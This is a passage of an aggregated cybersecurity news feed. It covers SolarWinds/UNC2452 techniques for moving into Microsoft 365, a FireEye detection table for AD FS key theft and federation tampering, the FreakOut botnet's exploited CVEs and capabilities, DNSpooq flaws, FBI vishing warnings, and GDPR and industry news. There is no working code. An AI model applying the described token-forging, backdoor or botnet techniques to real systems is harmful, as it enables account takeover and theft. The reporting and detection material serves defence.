  3. Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  4. Backdoor an existing Microsoft 365 application by adding a new application or service principal credential to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.

“It is important to note that there is no formal security boundary between on-premises networks and cloud services provided by Microsoft 365,” FireEye warned. “If an organization discovers evidence of targeted threat actor activity in their on-premises network, a thorough review of the cloud environment is often necessary as well.”

The post Researchers flag fourth piece of malware seen in SolarWinds hack and detail how Microsoft 365 got exploited first appeared on IT World Canada.

How IT leaders are securing identities with Zero Trust

The past twelve months have been a remarkable time of digital transformation as organizations, and especially digital security teams, adapt to working remotely and shifting business operations. IT leaders everywhere turned to Zero Trust approaches to alleviate the challenges of enabling and securing remote work. Using Zero Trust to secure users, data, and devices (wherever they may be) has changed from optional to a business imperative overnight.

In this short report, we surveyed IT leaders around the world to determine how they’re implementing Zero Trust practices to protect their identities and ensure their employees have secure access to resources.A clickable link to the full PDF infographic to the Zero Trust whitepaper

  1. Most IT leaders are already using Zero Trust practices with their identity management solutions. While the majority of IT leaders have already implemented Zero Trust practices into their identity and access solution, only a monitory have moved on to more advanced controls that utilize automation and AI-based threat analysis.
  2. Multi-factor authentication (MFA) and Single Sign-On (SSO) are the most common. Additionally, a majority are analyzing risk before granting access—a critical proactive step to preventing unauthorized access to corporate resources.
  3. Identities and devices are the top priority for most organizations. With employees working outside the corporate network and increasingly using personal devices, this is no surprise. However, surprisingly, the majority of IT leaders do not rate identities as the most mature component in their Zero Trust strategy.
  4. Zero Trust is still in infancy. Despite substantial growth in Zero Trust efforts over the past twelve months, only one in ten IT leaders report feeling very confident in their Zero Trust identity management roadmap.

Read the full report for more details.

If you’re looking for how to help prevent endpoints from being the weakest link in your security strategy, check out our Zero Trust deployment guidance for identities.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How IT leaders are securing identities with Zero Trust appeared first on Microsoft Security.

Desktops in the Data Center: Establishing ground rules for VDI

Since the earliest days of computing, we’ve endeavored to provide users with efficient, secure access to the critical applications which power the business.

From those early mainframe applications being accessed from hard-wired dumb terminals to the modern cloud-based application architectures of today, accessible to any user, from anywhere, on any device, we’ve witnessed the changing technology landscape deliver monumental gains in user productivity and flexibility.  With today’s workforce being increasingly remote, the delivery of secure, remote access to corporate IT resources and applications is more important than ever.

Although the remote access VPN has been dutifully providing secure, remote access for many years now, the advantages of centrally administering and securing the user desktop through Virtual Desktop Infrastructure (VDI) are driving rapid growth in adoption.  With options including hosting of the virtual desktop directly in the data center as VDI or in the public cloud as Desktop-as-a-Service (DaaS), organizations can quickly scale the environment to meet business demand in a rapidly changing world.

Allowing users to access a managed desktop instance from any personal laptop or mobile device, with direct access to their applications provides cost efficiencies and great flexibility with lower bandwidth consumption…. and it’s more secure, right?  Well, not so fast!

Considering the Risks

Although addressing some of the key challenges in enabling a remote workforce, VDI introduces a whole new set of considerations for IT security.  After all, we’ve spent years keeping users OUT of the data center…. and now with VDI, the user desktop itself now resides on a virtual machine, hosted directly inside the data center or cloud, right inside the perimeter security which is there to protect the organization’s most critical assets. The data!

This raises some important questions around how we can secure these environments and address some of these new risks.

  • Who is connecting remotely to the virtual desktop?
  • Which applications are being accessed from the virtual desktops?
  • Can virtual desktops communicate with each other?
  • What else can the virtual desktop gain access to outside of traditional apps?
  • Can the virtual desktop in any way open a reverse tunnel or proxy out to the Internet?
  • What is the security posture of the remote user device?
  • If the remote device is infected by virus or malware, is there any possible way that might infect the virtual desktop?
  • If the virtual desktop itself is infected by virus or malware, could an attacker access or infect other desktops, application servers, databases etc. Are you sure?

With VDI solutions today ranging from traditional on-premises solutions from Citrix and VMware to cloud offered services with Windows Virtual Desktop from Azure and Amazon Workspaces from AWS, there are differing approaches to the delivery of a common foundation for secure authentication, transport and endpoint control.  What is lacking however, is the ability to address some of the key fundamentals for a Zero Trust approach to user and application security across the multiple environments and vendors that make up most IT landscapes today.

How can Cisco Secure Workload (Tetration) help?

Cisco Secure Workload (Tetration) provides zero trust segmentation for VDI endpoints AND applications.  Founded on a least-privilege access model, this allows the administrator to centrally define and enforce a dynamic segmentation policy to each and every desktop instance and application workload.  Requiring no infrastructure changes and supporting any data center or cloud environment, this allows for a more flexible, scalable approach to address critical security concerns, today!

Establishing Control for Virtual Desktops

With Secure Workload, administrators can enforce a dynamic allow-list policy which allows users to access a defined set of applications and resources, while restricting any other connectivity.  Virtual desktops are typically connected to a shared virtual network, leaving a wide-open attack surface for lateral movement or malware propagation so this policy provides an immediate benefit in restriction of desktop to desktop communication.

This flexible policy allows rules to be defined based on context, whether identifying a specific desktop group/pool, application workloads or vulnerable machines, providing simplicity in administration and the flexibility to adapt to a changing environment without further modification.

  • Do your VDI instances really need to communicate with one another?

With a single policy rule, Secure Workload can enforce a desktop isolation policy to restrict communication between desktop instances without impacting critical services and application access.  This simple step will immediately block malware propagation and restrict visibility and lateral movement between desktops.

Deny policy for virtual desktop isolation
Figure 1: Deny policy for virtual desktop isolation
Lateral communication between desktops blocked (inbound and outbound)
Figure 2: Lateral communication between desktops blocked (inbound and outbound)
  • Want to permit only a specific user group access to your highly sensitive HR application?

Secure Workload will identify the desktop instances and application workloads by context, continuously refreshing the allow-list policy rules to permit this communication as users log in and out of their virtual desktops and as the application workloads evolve.

Context based application access control
Figure 3: Context based application access control
  • Need full visibility of which applications are being accessed, how and when?

Tetration not only enforces the allow-list policy to protect your assets, but also records flow data from every communication, ensuring continuous near-real-time compliance monitoring of traffic to identify malicious or anomalous behaviors.

  • Need to meet segmentation requirements for regulatory compliance?

Natural language policy definition based on dynamic labels and annotations ensures traffic complies with regulatory policy constraints from one well-defined policy intent.

  • Require the ability to automatically quarantine vulnerable virtual desktops or application workloads to protect against exploit?

Tetration natively detects vulnerable software packages to apply automated policy controls which only apply until remediation.

All offered from SaaS, this can be achieved without any change to existing infrastructure, with distributed enforcement at scale from virtual desktops to application workloads for end to end protection.

Ready to get started?  Find out more about Cisco Secure Workload

Researchers Discover Raindrop — 4th Malware Linked to the SolarWinds Attack

Cybersecurity researchers have unearthed a fourth new malware strain—designed to spread the malware onto other computers in victims' networks—which was deployed as part of the SolarWinds supply chain attack disclosed late last year. Dubbed "Raindrop" by Broadcom-owned Symantec, the malware joins the likes of other malicious implants such as Sunspot, Sunburst (or Solorigate), and Teardrop that

Out today: Defending against critical threats: A 12 month roundup

Inside, we take a retrospective look at cyber threats, and how they have evolved in the last 12 months. In something a little different to our previous reports, we’ve designed this in a magazine style format to include both interviews with security experts, and research driven features.

Our intention is to help inform strategic decision-making, as organizations prepare for threats they may encounter in the future. 

As a couple of callouts, we’ve included articles that address the ways cyber criminals sought to take advantage of the COVID-19 pandemic, be it through phishing campaigns, leveraging the great migration to remote work, or even going after health care organizations themselves.

Our interview with Esmond Kane, CISO for Steward Health Care, also shines a light on how COVID-19 impacted those on the security front line. 

In other topics, we’ve seen a large evolution in ransomware over the past year. Edmond Brumaghin, threat researcher for Cisco Talos, has pulled together some terrific research on Big Game Hunting attacks. This is when cyber criminals seek to monopolize a ransomware deployment by targeting backup systems, domain controllers, and other business-critical servers during a “post-compromise” phase. 

Our cover feature is the topic of election security. Cisco Talos spent four years conducting hands-on research into this field, and within this publication, we have an interview Matt Olney, Director of Talos threat intelligence and interdiction (who led this research) to capture his thoughts post-election. 

As our team were pulling this magazine together, what really struck me was that the topics illustrate how cyber threats impact our lives on a human level  from threats against our democracy, to our healthcare, to the organizations we work within. 

I hope you enjoy the read.

Click to read ‘Defending against critical threats: A 12 month roundup’

For more on these threat topics, take a listen to the latest episode of the Security Stories podcast.

Ben Nahorney, (my co-editor for the magazine), and I are joined live by Edmund Brumaghin to learn more about big game hunting attacks. Plus, we have the full interview with Esmond Kane to hear more about his experiences leading security on the front line of healthcare.

Listen below, or on on Apple PodcastsSpotifyGoogle Podcasts, or wherever you normally get your podcasts from.

 

Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452

In December 2020, FireEye uncovered and publicly disclosed a widespread attacker campaign that is being tracked as UNC2452. In some, but not all, of the intrusions associated with this campaign where Mandiant has visibility, the attacker used their access to on-premises networks to gain unauthorized access to the victim’s Microsoft 365 environment.

Goals and Objectives

Methodologies that UNC2452 and other threat actors have used to move laterally from on-premises networks to the Microsoft 365 cloud have been detailed in our white paper, Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. The paper also discusses how organizations can proactively harden their environments and remediate environments where similar techniques have been observed.

Mandiant is releasing an auditing script, Azure AD Investigator, through its GitHub repository that organizations can use to check their Microsoft 365 tenants for indicators of some of the techniques used by UNC2452. The script will alert administrators and security practitioners to artifacts that may require further review to determine if they are truly malicious or part of legitimate activity. Many of the attacker techniques detailed in the white paper are dual-use in nature—they can be used by threat actors but also by legitimate tools. Therefore, a detailed review for specific configuration parameters may be warranted, including correlating and verifying that configurations are aligned with authorized and expected activities.

Attacker Tactics, Techniques and Procedures (TTPs)

Mandiant has observed UNC2452 and other threat actors moving laterally to the Microsoft 365 cloud using a combination of four primary techniques:

  1. Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  2. Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  3. Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  4. Backdoor an existing Microsoft 365 application by adding a new application or service principal credential in order to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.

Read the white paper for a detailed overview of each technique, including practical remediation and hardening strategies, and check out our auditing script, Azure AD Investigator.  

Detections

FireEye Helix Detection

MITRE Technique

Detection Logic

MICROSOFT AZURE ACTIVE DIRECTORY [Risky Sign-In]

T1078.004

Alert on suspicious logon activity as detected by Azure Identity Protection

OFFICE 365 [Federated Domain Set]

T1550

Alert on new domain federation in Office 365

OFFICE 365 [Modified Domain Federation Settings]

 

T1550

Alert of modification to domain federations settings in Office 365

OFFICE 365 [User Added Credentials to Service Principal]

T1098.011

Alert on addition of certificates or passwords added to Service Principals

OFFICE 365 ANALYTICS [Abnormal Logon]

 

T1078.004

Alert on suspicious login activity based on heuristics

WINDOWS METHODOLOGY [ADFS Dump]

TA0006

T1552

T1552.004

T1199

Alert on activity access requests for the AD FS Distributed Key Manager (DKM) container in Active Directory

Privacy Fines: Total GDPR Sanctions Reach $331 Million

But Across Europe, Total Fines and Breach Reports Continue to Vary Widely by Country
Privacy watchdogs in Europe have imposed fines totaling more than $330 million since the EU's General Data Protection Regulation went into full effect in May 2018, according to law firm DLA Piper. Over the past year, regulations received 121,000 data breach notifications, up 19% from the year before.

FreakOut botnet target 3 recent flaws to compromise Linux devices

Security researchers uncovered a series of attacks conducted by the FreakOut botnet that leveraged recently discovered vulnerabilities.

Security researchers from Check Point have uncovered a series of attacks associated with the FreakOut botnet that is targeting multiple unpatched flaws in applications running on top of Linux systems.

The botnet appeared in the threat landscape in November 2020, in some cases the attacks leveraged recently disclosed vulnerabilities to inject OS commands. The attacks aimed at compromising the tarted systems to create an IRC botnet, which can later be used to conduct several malicious activities, including DDoS attacks and crypto-mining campaign.

The attacks observed by Check Point aimed at devices that run one of the following products:

  • TerraMaster TOS(TerraMaster Operating System) – the operating system used for managing TerraMaster NAS (Network Attached Storage) servers
  • Zend Framework –  a collection of packages used in building web application and services using PHP, with more than 570 million installations
  • Liferay Portal – a free, open-source enterprise portal. It is a web application platform written in Java that offers features relevant for the development of portals and websites

Once infected a device, it will be later used as an attacking platform.

FreakOut botnet

Botnet operators are scanning the internet for vulnerable applications affected by one of the recently disclosed vulnerabilities and take over the underlying Linux system:

  • CVE-2020-28188 – RCE flaw that resides in the TerraMaster management panel (disclosed on December 24, 2020) – This flaw could be exploited by a remote unauthenticated attacker to inject OS commands, and gain control of the servers using TerraMaster TOS (versions prior to  4.2.06).
  • CVE-2021-3007 – deserialization flaw that affects the Zend Framework (disclosed on January 3, 2021). The flaw affects Zend Framework versions higher than 3.0.0, the attacker can abuse the Zend3 feature that loads classes from objects to upload and execute malicious code in the server. The code can be uploaded using the “callback” parameter, which in this case inserts a malicious code instead of the “callbackOptions” array.
  • CVE-2020-7961 – Java unmarshalling flaw via JSONWS in Liferay Portal (in versions prior to 7.2.1 CE GA2) (disclosed on March 20, 2020). An attacker can exploit the flaw to provide a malicious object, that when unmarshalled, allows remote code execution.

“In all the attacks involving these CVEs, the attacker’s first move is to try running different syntaxes of OS commands to download and execute a Python script named “out.py”.” reads the analysis published by Check Point. “After the script is downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python 2. Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated product installed.”

The bot is an obfuscated Python script downloaded from the site https://gxbrowser[.]net consisting of polymorphic code.

The FreakOut botnet has a modular structure, it uses a specific function for each capability it supports. Below a list of functions implemented in the botnet:

  • Port Scanning utility
  • Collecting system fingerprint
    • Includes the device address (MAC, IP), and memory information. These are used in different functions of the code for different checks
    • TerraMaster TOS version of the system
  • Creating and sending packets
    • ARP poisoning for Man-in-the-Middle attacks.
    • Supports UDP and TCP packets, but also application layer protocols such as HTTP, DNS, SSDP, and SNMP
    • Protocol packing support created by the attacker.
  • Brute Force – using hard coded credentials 
    • With this list, the malware tries connecting to other network devices using Telnet. The function receives an IP range and tries to brute force each IP with the given credential. If it succeeds, the results of the correct credential are saved to a file, and sent in a message to the C2 server
  • Handling sockets
    • Includes handling exceptions of runtime errors.
    • Supports multi-threaded communication to other devices. This allows simultaneous actions the bots can perform while listening to the server
  • Sniffing the network
    • Executes using the “ARP poisoning” capability. The bot sets itself as a Man-in-the-Middle to other devices. The intercepted data is sent to the C2 server
  • Spreading to different devices, using the “exploit” function.
    • Randomly generates the IPs to attack
    • Exploits the CVEs mentioned above (CVE-2020-7961 , CVE-2020-28188, CVE-2021-3007)
  • Gaining persistence by adding itself to the rc.local configuration.
  • DDOS and Flooding – HTTP, DNS, SYN
    • Self-implementation of Slowlaris. The malware creates many sockets to a relevant victim address for the purpose of instigating a DDoS attack
  • Opening a reverse-shell – shell on the client
  • Killing a process by name or ID
  • Packing and unpacking the code using obfuscation techniques to provide random names to the different functions and variables.

The botnet could conduct multiple malicious activities by combining the above functions, such as delivering a cryptocurrency miners, launching DDoS, ot spreading laterally across the company network.

Check Point researchers analyzed the malicious code and were able to access the IRC channel used by the botmaster to control the botnet.

The botnet is in an early stage, at the time of the analysis, the IRC panel shows it was controlling only 188 bots.

Check Point experts were also able to track its author, who goes online with the moniker Freak.

“To identify the threat actors responsible for the attacks, we searched for leads in the internet and social media.  Searching for both the code author, who goes by the name “Freak” (which we have also seen in the IRC server channels) and the IRC bot name “N3Cr0m0rPh”, revealed information about the threat actor behind the campaign.” continues the analysis.

“In a post published on HackForums back in 2015, submitted by the user “Fl0urite” with the title “N3Cr0m0rPh Polymorphic IRC BOT”, the bot is offered for sale in exchange for BitCoins (BTC).”

The analysis published by the experts includes the MITRE ATT&CK TECHNIQUES and protections (IoCs, IPS, and Anti-Bot).

Pierluigi Paganini

(SecurityAffairs – hacking, FreakOut botnet)

The post FreakOut botnet target 3 recent flaws to compromise Linux devices appeared first on Security Affairs.

Never buy an iPad in January

If you're in the market for an iPad Pro, now is not the time to buy. We expect new iPad Pros to be introduced in March, and we have the pretty charts to back up that assertion.

World Economic Forum: Action Required to Address Digital Inequalities Post-COVID

World Economic Forum: Action Required to Address Digital Inequalities Post-COVID

“A world leader once said ‘a decade can go by without any real news and then you can feel a decade happening in a week.’ I feel that a decade has happened in the past year,” commented Børge Bende, president of the World Economic Forum (WEF), speaking during a press conference highlighting the findings from the organization’s 16th Global Risks Report 2021.

This has arisen from the ongoing COVID-19 pandemic, which has brought about substantial changes to the political, economic and social landscape. During the webinar, the panellists emphasized the growing importance of technology, both in helping governments and businesses function amid the ongoing crisis, and for the rebuilding of the world’s economy going forward.

Peter Giger, group chief risk officer, Zurich Insurance Group, explained that COVID-19 had accelerated the so-called ‘fourth industrial revolution’ by rapidly expanding areas such as e-commerce, online education, digital healthcare and remote working. “These shifts will continue to transform human interactions and livelihoods long after COVID is behind us,” he outlined.

This move towards a “digital economy” offers great opportunities but also poses the risk of more global inequality by the creation of an “underclass” of people who are excluded from work as a result of a lack of internet and educational access. For instance, the report noted that internet usage ranges from 87% of the population in high-income countries to under 17% in low-income countries. Widening inequality gaps is particularly dangerous at this time of substantial polarization and the biggest peacetime economic slump in history, as it will threaten global stability, according to Bende.

It is for this reason that the report listed digital inequality as one of the main risks over the coming years, and argued that economic growth needs to be more inclusive and sustainable. It is therefore critical that efforts are made to improve access to the internet and the development of digital skills. Bende added: “We have to invest in global access to the internet and we have to invest in schools, upskilling, reskilling, making sure that inequalities are not growing but are declining.”

As well as the potential sowing of more division through digital inequality, the panel highlighted other dangers that a rapid shift to technology brings. One of these is cybersecurity failures, which the WEF report highlighted as a big worry over the next two years. Carolina Klint, risk management leader for continental Europe at Marsh, noted that the almost overnight shift to home working many businesses were forced to undertake last year has “exponentially increased cyber-exposures and created more complex and potentially less secure networks.” Klint added: “Businesses should now really take the time to assess changes that were made in the heat of the pandemic and verify that the right investments have been made in networks and controls.”

Another major issue emanating from greater internet usage is the rise in misinformation, which has been particularly demonstrated by the fear-mongering and conspiracy theories linked to the COVID-19 crisis. In the view of Giger, this is causing more disconnect and polarization, as well as threatening democracy. However, governments must be cautious when taking regulatory action over this, and on protecting people from big tech monopolies, as this could lead to information censorship and more restricted internet access, risking “our hard won personal freedoms.”

Ultimately, the panel stated that the pandemic has provided an important lesson to countries in dealing with unexpected events. Guillaume Barthe-Dejean, director, chairman’s office at SK Group.  noted that those countries “that digitized early tended to perform better” both from a health and economic point of view. These were nations such as Japan, Korea and China, which have effective track and trace systems, more effective communications, a greater continuity of public services and minimized labor disruptions. Barthe-Dejean added: “That’s a real learning point from hyper-connected economies such as South Korea, which has the highest internet penetration, at 96.2% of it’s population.”

Dnsmasq vulnerabilities open networking devices, Linux distros to DNS cache poisoning

Seven vulnerabilities affecting Dnsmasq, a caching DNS and DHCP server used in a variety of networking devices and Linux distributions, could be leveraged to mount DNS cache poisoning attack and/or to compromise vulnerable devices. “Some of the bigger users of Dnsmasq are Android/Google, Comcast, Cisco, Red Hat, Netgear, and Ubiquiti, but there are many more. All major Linux distributions offer Dnsmasq as a package, but some use it more than others, e.g., in OpenWRT it … More

The post Dnsmasq vulnerabilities open networking devices, Linux distros to DNS cache poisoning appeared first on Help Net Security.

A Set of Severe Flaws Affect Popular DNSMasq DNS Forwarder

Cybersecurity researchers have uncovered multiple vulnerabilities in Dnsmasq, a popular open-source software used for caching Domain Name System (DNS) responses, thereby potentially allowing an adversary to mount DNS cache poisoning attacks and remotely execute malicious code. The seven flaws, collectively called "DNSpooq" by Israeli research firm JSOF, echoes previously disclosed weaknesses in

Vishing attacks conducted to steal corporate accounts, FBI warns

The Federal Bureau of Investigation (FBI) has issued a notification warning of ongoing vishing attacks attempting to steal corporate accounts.

The Federal Bureau of Investigation (FBI) published a Private Industry Notification (PIN) that warns of ongoing vishing attacks aimed at stealing corporate accounts and credentials from US and international-based employees.

Vishing (also known as voice phishing) is a social engineering attack technique where attackers impersonate a trusted entity during a voice call in an attempt to trick victims into providing sensitive information.

The alert highlights that during the COVID-19 pandemic, organizations are more exposed to these attacks because had quickly changed their working processes to maintain the social distancing. As a result, network access and privilege escalation may not be fully monitored.

The threat actors are using Voice over Internet Protocol (VoIP) platforms to obtain employees’ credentials.

“Cyber criminals are trying to obtain all employees’ credentials, not justindividuals who would likely have more access based on their corporate position.” reads the FBI alert. “The cyber criminals vished these employees through the use of VoIP platforms.”

Once gained access to the network, crooks expand their network access, for example, escalating privileges of the compromised employees’ accounts.

The alert reports the case of an attack in which cyber criminals found an employee via the company’s chatroom, and tricked him into logging into the fake VPN page. Then attackers used these credentials to log into the company’s VPN and performed reconnaissance to find employees with higher privileges who could perform username and e-mail changes and found an employee through a cloud-based payroll service. Then the attackers used a chatroom messaging service to conduct a phishing attack against this employee

Below the mitigations recommended by the FBI:

  • Implement multi-factor authentication (MFA) for accessing employees’ accounts in order to minimize the chances of an initial compromise.
  • When new employees are hired, network access should be granted on a least privilege scale. Periodic review of this network access for all employees can significantly reduce the risk of compromise of vulnerable and/or weak spots within the network.
  • Actively scanning and monitoring for unauthorized access or modifications can help detect a possible compromise in order to prevent or minimize the loss of data.
  • Network segmentation should be implemented to break up one large network into multiple smaller networks which allows administrators to control the flow of network traffic.
  • Administrators should be issued two accounts: one account with admin privileges to make system changes and the other account used for email, deploying updates, and generating reports.

In August, The FBI and CISA issued a joint alert to warn teleworkers of an ongoing vishing campaign targeting entities from multiple US sectors.

This is the second warning alerting of active vishing attacks targeting employees issued by the FBI since the start of the pandemic after an increasing number of them have become teleworkers.

In August 2020, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory warning remote workers of an ongoing vishing campaign targeting companies from several US industry sectors.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, vishing)

The post Vishing attacks conducted to steal corporate accounts, FBI warns appeared first on Security Affairs.

Injecting a Backdoor into SolarWinds Orion

Crowdstrike is reporting on a sophisticated piece of malware that was able to inject malware into the SolarWinds build process:

Key Points

  • SUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product.
  • SUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the SUNBURST backdoor code.
  • Several safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to the adversary’s presence.

Analysis of a SolarWinds software build server provided insights into how the process was hijacked by StellarParticle in order to insert SUNBURST into the update packages. The design of SUNSPOT suggests StellarParticle developers invested a lot of effort to ensure the code was properly inserted and remained undetected, and prioritized operational security to avoid revealing their presence in the build environment to SolarWinds developers.

This, of course, reminds many of us of Ken Thompson’s thought experiment from his 1984 Turing Award lecture, “Reflections on Trusting Trust.” In that talk, he suggested that a malicious C compiler might add a backdoor into programs it compiles.

The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well-installed microcode bug will be almost impossible to detect.

That’s all still true today.

Cloud Config Error Exposes X-Rated College Pics

Cloud Config Error Exposes X-Rated College Pics

A cloud misconfiguration at a now-defunct social media app has exposed hundreds of thousands of files, including explicit photos of users that they thought had been deleted, according to vpnMentor.

A research team led by Noam Rotem discovered the AWS S3 bucket on October 13 last year, tracing it back to Fleek and owner Squid Inc.

The app apparently marketed itself as an uncensored alternative to Snapchat “Campus Stories.” A hit with US college students, it promised to automatically delete photos after a short period, encouraging users to post salacious pics of themselves engaged in sexually explicit and illegal activities.

However, as the researchers found, many photos were not deleted at all — in fact, they were still being stored long after the app was closed down in 2019.

“Many of these were shared in folders given offensive and derogatory names like ‘asianAss’ by the app’s developers,” vpnMentor explained.

“Fleek users were mostly college students naive of the implications of uploading images that show them engaging in embarrassing and criminal activities, such as drug use. If cyber-criminals obtained these images and knew how to find the people exposed, they could easily target them and blackmail them for large sums of money.”

In total, the research team found around 377,000 files in the 32GB bucket. This also included photos and bot scripts which it’s believed relate to a paid chat room service the app’s owners were trying to promote to users.

To encourage male users, the app’s owners appear to have created numerous bot accounts using images of women scraped from the internet. To ‘chat’ to these bots, users would have to pay a fee.

Having contacted both Squid Inc’s founder and AWS to notify about the privacy snafu, vpnMentor found the bucket had been secured about a week after it was discovered. However, it’s unclear whether the data has been deleted or not.

“Never share anything you’d be embarrassed about online — few systems are 100% secure from hacking, leaks, or dishonest people saving incriminating images to hurt you in the future,” warned vpnMentor.

“It's also important to know what happens to your data after a company that has collected it goes bankrupt or shuts down. Often, with smaller companies, the owner maintains possession of the data, and there’s very little accountability stopping them from misusing it or sharing with others in the future.”

Choosing an MSP: Cymax Group case study

This is the last in a series of three articles sponsored by Ricoh looking at how different companies facing transformation evaluate their MSP options. The variety of services MSPs provide can range from the monitoring IT networks to being responsible for all repairs, updates and patches, as well as providing new software, hardware, infrastructure, cloud…

The post Choosing an MSP: Cymax Group case study first appeared on IT World Canada.

Most Financial Services Have Suffered COVID-Linked Cyber-Attacks

Most Financial Services Have Suffered COVID-Linked Cyber-Attacks

Financial services firms were hit hard over the past year, with 70% experiencing a successful cyber-attack and most of these blaming COVID-related conditions for the incident, according to Keeper Security.

The password security firm commissioned the Ponemon Institute to poll over 370 UK IT security leaders in the sector, as part of a larger global study.

It revealed that the rapid shift to remote working forced on businesses during the pandemic provided threat actors with an opportunity to target remote workers.

Over half (57%) of respondents argued that cyber-attacks are increasing in severity as a result of work-from-home (WFH) and 41% argued that remote workers are putting the business at risk of a major data breach.

Respondents were most concerned about a lack of physical security wherever their employees are remote working from (48%) and their devices becoming infected with malware (34%). This matters in the UK especially as it boasts more privileged users than any other country: 31% of remote workers have access to critical, sensitive and proprietary information.

Trend Micro research last year revealed that home workers often engage in more risky behavior than when they’re at the office. When combined with the surge in COVID-19 phishing emails and devices that may be shared with other users in the same household and/or less well protected than corporate equivalents, it adds up to a potential perfect storm of risk.

Insufficient budget and lack of know-how on combatting cyber-attacks were flagged by respondents as the biggest IT security challenges with remote working.

They were most concerned about the threat to customer records (50%) and financial information (48%). IT security managers right to be worried, given the potential regulatory and reputational impact of a breach.

According to Keeper Security CEO, Darren Guccione, things are particularly precarious given the double whammy of the pandemic and Brexit, which saw UK banks lose their crucial “passporting” rights.

“The adjustments to life as we know it due to COVID-19, and the limitations set to be imposed by Brexit, have seen businesses struggle adopt essential operational requirements to stay afloat,” he argued.

“Without rigorous security in place, financial institutions across the UK jeopardise their future. It only takes one cyber-attack to destroy the reputation of the entire business.”

New Educational Video Series for CISOs with Small Security Teams

Cybersecurity is hard. For a CISO that faces the cyber threat landscape with a small security team, the challenge is compounded. Compared to CISOs at large enterprises, CISOs small to medium-sized enterprises (SMEs) have smaller teams with less expertise, smaller budgets for technology and outside services, and are more involved in day-to-day protection activities. CISOs at SMEs are

FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities

An ongoing malware campaign has been found exploiting recently disclosed vulnerabilities in network-attached storage (NAS) devices running on Linux systems to co-opt the machines into an IRC botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency. The attacks deploy a new  malware variant called "FreakOut" by leveraging critical flaws fixed in Laminas

Hashtag Trending – DuckDuckGo hits milestone; Snapchat handing out cash; Tech withdrawal

DuckDuckGo reaches a milestone of 100 million daily search queries, Snapchat is giving out big bucks, and experts predict that kids will face a tech withdrawal once life returns to “normal.”

The post Hashtag Trending – DuckDuckGo hits milestone; Snapchat handing out cash; Tech withdrawal first appeared on IT World Canada.

GDPR Fines Surge 39% Over Past Year Despite #COVID19

GDPR Fines Surge 39% Over Past Year Despite #COVID19

The past year has seen double-digit increases in the value of GDPR fines imposed by regulators and the volume of breaches notified to regulators, according to a new analysis by DLA Piper.

The international law firm said that €158.5m ($192m, £141m) in fines was imposed since January 28 2020, a 39% increase on the previous 20-month period since the law came into force in May 2018.

Breach notifications surged by 19%, the second consecutive double-digit increase, to reach 121,165 over the past year.

In total, €272.5m ($332m, £45m) in fines has been issued since the start of the new regulatory regime, with Italy (€69m) having imposed the larges number, followed by Germany and France.

Total breach notification volumes have reached 281,000, with Germany (77,747), the Netherlands (66,527) and the UK (30,536) topping the table. However, when weighted according to national populations, Denmark comes top, followed by the Netherlands and Ireland.

Although the upward trajectory of fines and notifications would suggest that the GDPR is forcing organizations to be more transparent about incidents and providing regulators with a powerful statutory instrument to punish major transgressors, the truth is more nuanced.

In the UK, for example, the Information Commissioner’s Office (ICO), a leading regulator in the drafting of the legislation, significantly reduced fines planned for BA and Marriot International, from a combined £282m to just £38m last year. It is believed the COVID-19 pandemic may have been a factor.

Concerns were raised last year that national regulators are simply not resourced sufficiently to launch major investigations against the world’s biggest companies, especially tech giants with deep pockets.

However, the coming year is likely to see a ramping up of regulatory pressure, warned Ross McKean, chair of DLA Piper’s UK Data Protection and Security Group.

“Regulators have adopted some extremely strict interpretations of GDPR, setting the scene for heated legal battles in the years ahead. However, we have also seen regulators show a degree of leniency this year in response to the ongoing pandemic with several high-profile fines being reduced due to financial hardship,” he explained.

“During the coming year we anticipate the first enforcement actions relating to GDPR’s restrictions on transfers of personal data to the US and other ‘third countries’ as the aftershocks from the ruling by Europe’s highest court in the Schrems II case continue to be felt."

Is Signal Secure? An Analysis of its History, Encryption Protocol, and Privacy Policy

Everyone from Elon Musk to Edward Snowden has been talking about Signal these days. Friends, family, and followers received recommendations to create accounts left and right, leaving us to wonder: what is Signal? And even more importantly, is Signal secure? Before diving into the technical details, I’ll have a brief look at the app’s history […]

The post Is Signal Secure? An Analysis of its History, Encryption Protocol, and Privacy Policy appeared first on Heimdal Security Blog.

Machine Learning in Cybersecurity: The New Essential for Enhanced Performance

Machine learning is usually mentioned in contexts that actually refer to artificial intelligence or used as a synonym. Let us have a closer look at what the terms artificial intelligence, machine learning and deep learning (another common notion used in relation to AI) really mean. We will also discuss how we can use machine learning […]

The post Machine Learning in Cybersecurity: The New Essential for Enhanced Performance appeared first on Heimdal Security Blog.

